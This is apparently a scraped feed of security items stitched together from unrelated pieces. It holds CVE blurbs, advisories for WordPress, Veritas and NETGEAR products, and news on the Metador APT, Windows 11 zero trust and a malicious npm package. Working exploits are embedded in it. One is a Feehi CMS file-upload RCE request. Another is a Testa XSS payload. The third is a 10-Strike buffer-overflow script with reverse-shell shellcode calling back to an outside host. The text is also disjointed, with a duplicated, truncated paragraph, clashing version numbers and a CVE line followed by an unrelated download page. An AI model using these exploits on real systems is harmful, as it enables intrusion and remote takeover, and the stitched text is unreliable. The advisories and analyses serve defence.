The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

CVE-2022-2937: Vulnerability Advisories - Wordfence

A local privilege escalation vulnerability in UI Desktop for Windows (Version 0.55.1.2 and earlier) allows a malicious actor with local access to a Windows device with UI Desktop to run arbitrary commands as SYSTEM.

CVE-2022-35257

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)# Date: 28/08/2022# Exploit Author: Ashkan Moghaddas# Vendor Homepage: https://testa.cc# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip# Version: 3.5.1# Tested on: Windows/Linux# Proof of Concept:# 1- Install Testa 3.5.1# 2- Go to https://localhost.com/login.php?redirect=XXXX# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E# 4- XSS has been triggered.# Go to this url "https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E"XSS will trigger.

Testa 3.5.1 Cross Site Scripting

A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa.
"The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security

A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa.

"The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security solutions," researchers from SentinelOne said in a new report.

The cybersecurity firm codenamed the group **Metador** in reference to a string "I am meta" in one of their malware samples and because of Spanish-language responses from the command-and-control (C2) servers.

The threat actor is said to have primarily focused on the development of cross-platform malware in its pursuit of espionage aims. Other hallmarks of the campaign are the limited number of intrusions and long-term access to targets.

This includes two different Windows malware platforms called metaMain and Mafalda that are expressly engineered to operate in-memory and elude detection. metaMain also acts as a conduit to deploy Mafalda, a flexible interactive implant supporting 67 commands.

metaMain, for its part, is feature-rich on its own, enabling the adversary to maintain long-term access, log keystrokes, download and upload arbitrary files, and execute shellcode.

In a sign that Mafalda is being actively maintained by its developers, the malware gained support for 13 new commands between two variants compiled in April and December 2021, adding options for credential theft, network reconnaissance, and file system manipulation.

Attack chains have further involved an unknown Linux malware that's employed to gather information from the compromised environment and funnel it back to Mafalda. The entry vector used to facilitate the intrusions is unknown as yet.

What's more, references in the internal command's documentation for Mafalda suggest a clear separation of responsibilities between the developers and operators. Ultimately though, Metador's attribution remains a "garbled mystery."

"Moreover, the technical complexity of the malware and its active development suggest a well-resourced group able to acquire, maintain and extend multiple frameworks," researchers Juan Andres Guerrero-Saade, Amitai Ben Shushan Ehrlich, and Aleksandar Milenkoski noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover New Metador APT Targeting Telcos, ISPs, and Universities

With the update, Microsoft adds features to allow easier deployment of zero-trust capabilities. Considering the 1.3 billion global Windows users, the support could make a difference.

Organizations aiming to boost their security with zero-trust initiatives got some help from Microsoft this week, when the computing giant announced that a slew of zero-trust features are now available in its Windows 11 operating system.

The zero-trust approach to security aims to secure workers' access to sensitive systems, network, and data by using additional context, analysis, and security controls. The goal is to give "the right people the right access at the right time," Microsoft stated in the Windows 11 Security Book, a 74-page report on Windows 11's security architecture.

The model checks a user's identity and location, as well as their device's security status, and only allows access to the appropriate resources, according to the Windows 11 Security Book. In addition, zero-trust capabilities include continuous visibility and analysis to catch threats and improve defenses.

The latest version of the operating system and software platform adds a variety of features, from support for the Pluton security processor and trusted platform modules (TPMs) to comprehensive features around Trusted Boot, cryptography, and code-signing certificates, says David Weston, vice president of enterprise and OS security at Microsoft.

"Organizations worldwide are adopting a zero-trust security model based on the premise that no person or device anywhere can have access until safety and integrity is proven," he says. "We know that our customers need modern security solutions with tightly integrated hardware and software that protects from entire classes of attack."

**The Zero-Trust Buzz Gets a Boost**

The zero-trust concept has been knocking around for years, with technologists and government agencies first discussing it for security with the dawning realization that network perimeters were rapidly disappearing. Then, the work-from-home surge caused by the coronavirus pandemic injected more urgency into the movement. Now, three-quarters of security decision-makers (75%) believe that the increase in hybrid work creates vulnerabilities at their organization, leaving them more open to attacks.

"When employees are given the freedom to choose their work location, device, tools, and/or software, it becomes a challenge to establish trust based on static attributes," says Ben Herzberg, chief scientist at Satori. "As the competitive pressure pushes companies to democratize data and release new customer value faster, employees will be provided more flexibility, and zero trust will be the go-to approach for enabling that flexibility while ensuring security."

That said, implementing zero trust is a complex endeavor, as evidenced by the list of aspects that Microsoft has now built in:

    

Microsoft's Windows 11 security architecture. Source: Microsoft's Windows 11 Security Book.

The new Windows 11 features include Smart App Control, which uses machine learning, AI modeling, and Microsoft's vast telemetry network of 43 trillion daily signals to determine if an application is safe. Other features also determine whether driver code and virtual-machine code have signs of maliciousness. Additional improvements include credential checks in Windows Defender, password-less support with Windows Hello for Business, and protection against credential-harvesting websites, the company stated.

Complexity has hampered zero-trust rollouts, but adding these feature directly into Windows 11 makes it more likely that companies can easily deploy zero-trust capabilities, says Microsoft's Weston.

"Building in instead of bolting on makes deployment and management of zero-trust capabilities much simpler and efficient," he says. "In addition, having these \[features\] directly integrated in the OS enables Windows to provide key measurements in hardware increasing the trust and validity of measurements."

He adds, "The minute zero-trust capabilities are embedded into enterprise infrastructure, it becomes accessible for many companies that would otherwise have a hard time getting access to this technology. ... An integrated client environment for zero trust will make the transition for employees much smoother and internal change management simpler."

Microsoft throwing its considerable weight behind zero trust should indeed move the needle on adoption and overall security: Microsoft sees 2.5 billion endpoint queries and 80 million password attacks on a daily basis, the firm stated in a blog post published this week.

**Zero Trust Is Still Hard**

Even with the Windows 11 updates, companies should expect implementing zero trust to be a process. Building a zero-trust framework requires deep technical integrations, and the organizations that do that best are the ones most likely to be successful in their implementation, says Satori's Herzberg.

To start off, companies should identify a group of users, devices, applications, and workflows that could benefit from zero trust; create a zero-trust architecture to protect those components; and then choose and implement the proper technologies, he says.

An incremental rollout works, given that zero trust is more of a journey than a destination, says Jason Floyd, chief technology officer at Ascent Solutions.

"Zero trust was never about solving a technology problem — it’s a strategic tool directing how to use the technology already in place," he says. "Building additional zero-trust features into Windows does encourage enterprises to adopt a healthy security mindset, but not for the one-size-fits all solution some executives might be expecting."

Overall, Windows 11 adds "chip-to-cloud security," establishing trusted processes starting with firmware and reaching out to workloads running in the cloud, Microsoft's publication stated. This support aids zero-trust architectures by minimizing the work required to prove a user's identity and check system health, says Microsoft's Weston.

"This inverts the previous paradigm of systems security where a user or device was assumed healthy until proven guilty," he says. "Microsoft's view is that the zero-trust philosophy and architecture addresses many of the current and future security challenges for customers and thus Microsoft and most of our customers believe this will be the dominant approach to security."

Microsoft Looks to Enable Practical Zero-Trust Security With Windows 11

Veritas System Recovery (VSR) versions 18 and 21 store a network destination password in the Windows registry during configuration of the backup configuration. This vulnerability could provide a Windows user (who has sufficient privileges) to access a network file system that they were not authorized to access.

**Revision History**

*   1.0: September 7, 2021: Initial version

**Summary**

A Sensitive Information Disclosure Vulnerability has been found in Veritas System Recovery (VSR).

**Issue**

*   Sensitive Information Disclosure Vulnerability: Password Stored in Windows Registry
*   CVE ID: To be assigned
*   Severity: Medium
*   CVSS v3.1 Base Score 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Veritas System Recovery (VSR) versions 18 and 21 store a network destination password in the Windows registry during configuration of the backup configuration. This vulnerability could provide a Windows user who has sufficient privileges to access a network file system which they were not authorized to access.

**Remediation**

Customers under a current maintenance contract can download and install application binaries which mitigate this vulnerability, as described below:

*   If you are on VSR 18:

*   Ensure that your system has been updated to the latest service pack VSR 18 SP4, and
*   Download the updated VProSvc.exe ( Version: 18.0.4.57090 ) for your operating system
*   Replace the VProSvc.exe on your server and clients with the updated version

*   If you are on VSR 21:

*   Ensure that your system has been updated to the latest service pack VSR 21 SP3, and
*   Download the updated VProSvc.exe ( Version: 21.0.3.62140 ) for your operating system
*   Replace the VProSvc.exe on your server and clients with the updated version

See the Veritas Download Center for available updates: https://www.veritas.com/support/en\_US/downloads

**Questions**

For questions or problems regarding these vulnerabilities please contact Veritas Technical Support (https://www.veritas.com/support), or see the Article id: 100051263.

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2022-41320: Sensitive Information Disclosure Vulnerability in Veritas System Recovery

10-Strike Network Inventory Explorer v9.3 was discovered to contain a buffer overflow via the Add Computers function.

I. VULNERABILITY  
-------------------------  
10-Strike Network Inventory Explorer Version 9.51 - Privilege Escalation through SEH based Buffer Overflow

II. CVE REFERENCE  
-------------------------  
CVE-2022-38573

III. VENDOR  
-------------------------  
10-Strike Network (https://www.10-strike.com/)

IV. DESCRIPTION  
-------------------------

10-Strike Network Inventory Explorer until latest version (9.51) is vulnerable to a SEH based Buffer Overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.

V. REFERENCES  
-------------------------  
Vendor website: https://www.10-strike.com/  
Product website: https://www.10-strike.com/networkinventoryexplorer/

VI. EXPLOIT  
-------------------------  
# Date: 16/08/2022  
# Exploit Author: Ricardo Ruiz (@ricardojoserf)  
# Usage: Create a file with this script and upload it clicking "Computers" and "From Text File". It should pop a calculator

from struct import pack

# Bad chars are: \x09\x0a\x0d\x3a\x5c  
badchars = (  
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"  
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x3f\x40"  
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"  
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5d\x5e\x5f\x60"  
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"  
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"  
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"  
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"  
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"  
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"  
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"  
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"  
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"  
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"  
#b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"  
#b"\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f\x10"  
)

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.81 -b "\x00\x09\x0a\x0d\x3a\x5c\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f\x10" -v payload --smallest -f py  
payload =  b""  
payload += b"\x89\xe3\xdb\xd0\xd9\x73\xf4\x5b\x53\x59\x49\x49"  
payload += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"  
payload += b"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"  
payload += b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"  
payload += b"\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
payload += b"\x69\x6c\x79\x78\x4c\x42\x43\x30\x53\x30\x33\x30"  
payload += b"\x51\x70\x6e\x69\x6b\x55\x30\x31\x69\x50\x61\x74"  
payload += b"\x6c\x4b\x36\x30\x56\x50\x4c\x4b\x50\x52\x76\x6c"  
payload += b"\x6e\x6b\x63\x62\x57\x64\x4c\x4b\x32\x52\x45\x78"  
payload += b"\x34\x4f\x58\x37\x32\x6a\x54\x66\x56\x51\x49\x6f"  
payload += b"\x6e\x4c\x45\x6c\x43\x51\x43\x4c\x74\x42\x34\x6c"  
payload += b"\x51\x30\x69\x51\x5a\x6f\x76\x6d\x35\x51\x68\x47"  
payload += b"\x4d\x32\x4c\x32\x32\x72\x33\x67\x4e\x6b\x62\x72"  
payload += b"\x64\x50\x6e\x6b\x71\x5a\x65\x6c\x6e\x6b\x70\x4c"  
payload += b"\x54\x51\x43\x48\x78\x63\x53\x78\x36\x61\x4a\x71"  
payload += b"\x46\x31\x4e\x6b\x30\x59\x35\x70\x65\x51\x49\x43"  
payload += b"\x4c\x4b\x50\x49\x34\x58\x59\x73\x47\x4a\x32\x69"  
payload += b"\x6c\x4b\x66\x54\x6c\x4b\x76\x61\x69\x46\x75\x61"  
payload += b"\x69\x6f\x6c\x6c\x69\x51\x5a\x6f\x64\x4d\x66\x61"  
payload += b"\x6f\x37\x66\x58\x39\x70\x63\x45\x49\x66\x64\x43"  
payload += b"\x73\x4d\x49\x68\x77\x4b\x51\x6d\x66\x44\x43\x45"  
payload += b"\x5a\x44\x51\x48\x6c\x4b\x56\x38\x37\x54\x76\x61"  
payload += b"\x7a\x73\x35\x36\x4e\x6b\x76\x6c\x30\x4b\x6c\x4b"  
payload += b"\x46\x38\x47\x6c\x56\x61\x58\x53\x6e\x6b\x74\x44"  
payload += b"\x6e\x6b\x45\x51\x38\x50\x6e\x69\x52\x64\x51\x34"  
payload += b"\x37\x54\x33\x6b\x31\x4b\x61\x71\x33\x69\x51\x4a"  
payload += b"\x62\x71\x49\x6f\x6b\x50\x31\x4f\x73\x6f\x33\x6a"  
payload += b"\x4c\x4b\x62\x32\x5a\x4b\x4e\x6d\x31\x4d\x63\x58"  
payload += b"\x55\x63\x55\x62\x43\x30\x73\x30\x73\x58\x33\x47"  
payload += b"\x44\x33\x76\x52\x61\x4f\x46\x34\x51\x78\x42\x6c"  
payload += b"\x34\x37\x54\x66\x57\x77\x79\x6f\x79\x45\x6e\x58"  
payload += b"\x6c\x50\x47\x71\x75\x50\x43\x30\x77\x59\x38\x44"  
payload += b"\x30\x54\x36\x30\x45\x38\x67\x59\x6b\x30\x70\x6b"  
payload += b"\x43\x30\x79\x6f\x59\x45\x52\x70\x50\x50\x30\x50"  
payload += b"\x42\x70\x33\x70\x56\x30\x61\x50\x72\x70\x53\x58"  
payload += b"\x4a\x4a\x76\x6f\x79\x4f\x79\x70\x59\x6f\x79\x45"  
payload += b"\x6d\x47\x32\x4a\x47\x75\x63\x58\x69\x50\x69\x38"  
payload += b"\x34\x71\x33\x61\x65\x38\x74\x42\x45\x50\x75\x51"  
payload += b"\x6f\x4b\x4e\x69\x38\x66\x31\x7a\x34\x50\x46\x36"  
payload += b"\x31\x47\x32\x48\x6d\x49\x49\x35\x51\x64\x45\x31"  
payload += b"\x79\x6f\x69\x45\x4d\x55\x4b\x70\x53\x44\x56\x6c"  
payload += b"\x49\x6f\x72\x6e\x46\x68\x64\x35\x78\x6c\x71\x78"  
payload += b"\x38\x70\x6d\x65\x79\x32\x42\x76\x49\x6f\x68\x55"  
payload += b"\x63\x58\x52\x43\x30\x6d\x75\x34\x33\x30\x6c\x49"  
payload += b"\x6a\x43\x63\x67\x52\x77\x33\x67\x50\x31\x79\x66"  
payload += b"\x30\x6a\x62\x32\x53\x69\x76\x36\x59\x72\x4b\x4d"  
payload += b"\x65\x36\x6b\x77\x43\x74\x46\x44\x37\x4c\x47\x71"  
payload += b"\x56\x61\x4e\x6d\x73\x74\x77\x54\x66\x70\x4a\x66"  
payload += b"\x33\x30\x43\x74\x30\x54\x70\x50\x51\x46\x76\x36"  
payload += b"\x36\x36\x51\x56\x30\x56\x30\x4e\x72\x76\x62\x76"  
payload += b"\x56\x33\x56\x36\x62\x48\x63\x49\x6a\x6c\x75\x6f"  
payload += b"\x4f\x76\x59\x6f\x49\x45\x4d\x59\x6d\x30\x52\x6e"  
payload += b"\x70\x56\x61\x56\x59\x6f\x44\x70\x35\x38\x53\x38"  
payload += b"\x6c\x47\x55\x4d\x61\x70\x6b\x4f\x79\x45\x4d\x6b"  
payload += b"\x7a\x50\x48\x35\x4d\x72\x43\x66\x50\x68\x6c\x66"  
payload += b"\x7a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4b\x65\x65\x6c"  
payload += b"\x46\x66\x63\x4c\x55\x5a\x6b\x30\x6b\x4b\x6d\x30"  
payload += b"\x51\x65\x75\x55\x4f\x4b\x72\x67\x72\x33\x52\x52"  
payload += b"\x72\x4f\x63\x5a\x35\x50\x61\x43\x79\x6f\x39\x45"  
payload += b"\x41\x41"

#buffer = "A"*100000  
buffer =  b"A"*207  
buffer += b"\x90\x90\xeb\x04" # bp 0x61e4dab1; g  
buffer += b"\xb1\xda\xe4\x61"  
buffer += b"\x90"*2  
buffer += payload

with open("test.txt", 'wb') as out:  
    out.write(buffer)

CVE-2022-38573: 10-Strike Network Inventory Explorer 9.3 Buffer Overflow ≈ Packet Storm

Netgear N300 wireless router wnr2000v4-V1.0.0.70 was discovered to contain a stack overflow via strcpy in uhttpd.

**Where to Find Your Model Number**

To find the model/version number, check the bottom or back panel of your NETGEAR device.

Select a product or category below to see an example.

To find documentation, firmware, software, or other files, enter a whole or partial model number in the text search box.

**Enter a Product Name/Model Number**

**Can't find what you're looking for?**

Quick and easy solutions are available for you in the NETGEAR community.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home**

A single point of support around the clock. GearHead Technical Support makes it easy to fix issues on not just your NETGEAR purchase but for your entire home network. The service includes support for the following:

*   NETGEAR and non-NETGEAR network devices
*   Desktop and Notebook PCs, Printers, Scanners, and more
*   Windows Operating Systems, MS Office, Outlook, and more

Learn More

**NETGEAR ProSupport for Home**

Protect and support your recent NETGEAR purchase. With NETGEAR ProSupport for Home, extend your warranty entitlement and support coverage further and get access to experts you trust.

*   Protect your investment from the hassle of unexpected repairs and expenses
*   Connect with experienced NETGEAR experts who know your product the best
*   Resolve issues faster with 24/7 service

Learn More

**NETGEAR ProSupport for Business**

NETGEAR ProSupport for Business services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSupport for Business services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2022-31937: Download Center | Support | NETGEAR

Branded as a components library for two popular open source resources, Material Tailwind instead loads a Windows .exe that can run PowerShell scripts.

A malicious package in the npm open source code repository is hitching a social engineering ride on the "Tailwind" legitimate software library tool, which millions of application developers use around the globe. The finding comes as threat actors continue to see opportunity in seeding open source software with malware.

Threat actors are branding the malicious package as "Material Tailwind," describing it as "an easy-to-use components library for Tailwind CSS and Material Design," two commonly used open source libraries that have millions of downloads each, researchers from ReversingLabs have found.

Tailwind is as an open source CSS framework that doesn’t provide predefined classes for elements, while Material Design is a design language that uses grid-based layouts, responsive animations, and other visual effects. Both "are recognizable names and massively popular libraries among developers," according to the firm.

However, Material Tailwind is not helpful to developers at all, researchers revealed in a post published on Sept. 22. It instead delivers a multistage attack — rare for this type of malware — that downloads a malicious, custom-packed Windows executable capable of running PowerShell scripts.

"In most of these cases, the malware in question is fairly simple JavaScript code that is rarely even obfuscated," Karlo Zanki, reverse engineer at ReversingLabs, observed in the post. "Sophisticated multistage malware samples like Material Tailwind are still a rare find."

Researchers at ReversingLabs detected the malicious behavior because the purported library modification contained code obfuscated with JavaScript Obfuscator. Moreover, while the description of the package seemed legitimate enough, closer inspection revealed that it was copied from another npm package named tailwindcss-stimulus-components, they said, which the threat actors then Trojanized.

"The threat actor took special care to modify the entire text and code snippets to replace the name of the original package with Material Tailwind," Zanki wrote. "The malicious package also successfully implements all of the functionality provided by the original package."

**How the Attack Works**

ReversingLabs researchers analyzed Material Tailwind in detail by de-obfuscating the suspicious script, executes immediately after the package is installed — behavior that is in and of itself "a (big) red flag" for threat researchers, Zanki noted.

Once the package installs, the module first sends a POST request with platform information to a specific IP address to validate that it's being executed on a Win32 system. If so, it constructs a download link containing the type of the operating system, and it also adds a parameter likely used to validate that the download request is coming from the victim's machine, researchers found.

A password-protected .zip archive named DiagnosticsLogger.zip is downloaded, which contains a single file, named DiagnosticsHub.exe, likely to disguise the payload as some kind of diagnostic tool, Zanki noted. Attackers probably use password protection to avoid basic antivirus checks as well, he said.

Finally, the script spawns a child process that executes the downloaded file, a custom-packed, Windows executable that uses several protections aimed at making it difficult to analyze, Zanki said.

Packed information includes several PowerShell code snippets responsible for command and control, communication, and process manipulation, researchers found. The malware achieves persistence by executing a Base64-encoded PowerShell command, which sets up a scheduled task to be executed daily.

A stage-two process of the malicious code fetches an XOR-encrypted and Base64-encoded file from a public Google Drive link or, in the case that the link can't be accessed, from one or the other of two alternative download locations — one at GitHub and another one at OneDrive, researchers found.

At the time of publication, the encrypted file contains a single IP address, which is the location of its command-and-control server from which the malware receives encrypted instructions using a dedicated socket connection, they added.

**Weaponizing Open Source Code**

Open source software and npm packages in particular have become a target of choice for threat actors lately because they can easily be weaponized against the software supply chain. In fact, planting malware in open source code is one of the fastest-growing types of software supply chain attacks "being spotted almost daily now," according to Zanki.

These types of attacks also are forcing enterprises to pivot when it comes to how they secure their environments, notes Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center.

"Up until recently, organizations only had to contend with the security vulnerabilities in their applications that were unintentionally inherited through open source components and their dependencies — which wasn’t a trivial task to begin with," he says. "Now, attackers are baiting organizations into using open source packages that were modified with malicious intent."

Npm packages are an attractive conduit for software supply chain attacks "in part due to the sheer volume of open source components and dependencies typically used to build NodeJS applications," he observed.

These dependencies indeed are increasing the security risks for enterprises, presently a considerable challenge in how quickly problems throughout resources can multiply, notes Ben Pick, principal cybersecurity consultant at application security provider nVisium.

"Thus, an attacker would only need to target and compromise one of the many open source projects in a pipeline to cause considerable harm," he observes.

**Software Supply Chain: Multiple Cyberattack Options**

Attackers that leverage npm packages are getting creative in how they use the open source repositories.

A report published in February identified more than 1,300 malicious npm packages in 2021 that allowed attackers to get up to a number of nefarious activities, including cryptojacking and data theft. In terms of tricking people into installing them, some packages masquerade as tools for security research, researchers found.

Two examples of recent attacks in which attackers leverage npm packages surfaced in July. The first, reported on July 5, revealed a long-range supply chain attack after several packages using a JavaScript obfuscator to hide their true function were discovered in April.

In another, reported on July 29, attackers used four npm packages containing highly obfuscated malicious Python and JavaScript code to spread the "Volt Stealer" and "Lofy Stealer" malware to collect information from their victims, including Discord tokens and credit-card information, as well as spy on them over time.

Tag

#windows